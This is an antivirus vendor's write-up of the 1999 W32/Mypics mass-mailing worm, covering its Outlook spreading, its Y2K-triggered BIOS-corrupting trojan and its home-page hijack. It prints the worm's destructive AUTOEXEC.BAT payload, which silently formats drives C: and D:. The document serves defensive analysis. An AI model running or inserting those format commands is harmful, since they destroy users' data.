I-Worm.Mypics, W32/Mypics.bat, W32/Mypics.com, W32/Mypics.worm

W32/Mypics.com, W32/Mypics.bat

Date Added

 Discovery Date:11/29/99
 Risk Assessment:medium
 Minimum DAT:4055
 Minimum Engine:4.0.25

This worm was written in Visual Basic and has a reliance on the library file MSVBVM50.DLL. Without this file, the program will error. This file will copy itself to the local machine and register itself to run from the registry at system startup from either of these locations, depending on if the operating system is Windows 9x or NT:



While the file runs as a task in memory, it is performing two functions. One function is to spread via an email routine while the other is a monitor for the system clock to reach January 1st 2000.

This worm uses mass email for distribution, if executed. It appears to use code similar to W97M/Melissa virus to distribute itself using MS Outlook to the first 50 email recipients, however emails created by this worm do not contain a subject line, only the message body of "Here's some pictures for you !" and the email message also has the attached file "Pics4You.exe" with a size of 34,304 bytes.

If the worm is running as a task and detects that the year has changed from 1999 to 2000, this worm writes a .COM file to the local machine in the root of drive C: named "CBIOS.COM". This small file is a trojan which overwrites the checksum value for the BIOS on the local system.

The AUTOEXEC.BAT is also overwritten with these instructions:

ctty nul
format d: /autotest /q /u
format c: /autotest /q /u

Since the AUTOEXEC.BAT startup file is not implemented in Windows NT, this file is never run. After the AUTOEXEC.BAT modification, the user's home page is reset to point to the following web location: http://www.geocities.com/SiliconValley/Vista/8279/index.html

Reset your browser home page manually to correct this.

In AVERT testing on a standard Windows 95 system, if the system date is already beyond January 1, 2000 when this worm is initially installed, the damaging payload is not exhibited.

Both the BAT and COM files are detected as "W32/Mypics.bat" and "W32/Mypics.com" respectively.

Existence of this file on the local system - modifications to the system registry as mentioned above - mass mailings as mentioned above.

Method Of Infection
Running the executable will directly copy itself and run the mass mailing routine.

EXTRA Drivers
VirusScan 4 with the 4.0.25 engine (and above) download here.
Dr. Solomon's AVTK 7.95 (and above) download here.
There is no detection for VirusScan 3.

Removal Instructions
Use current engine and DAT files for detection and removal.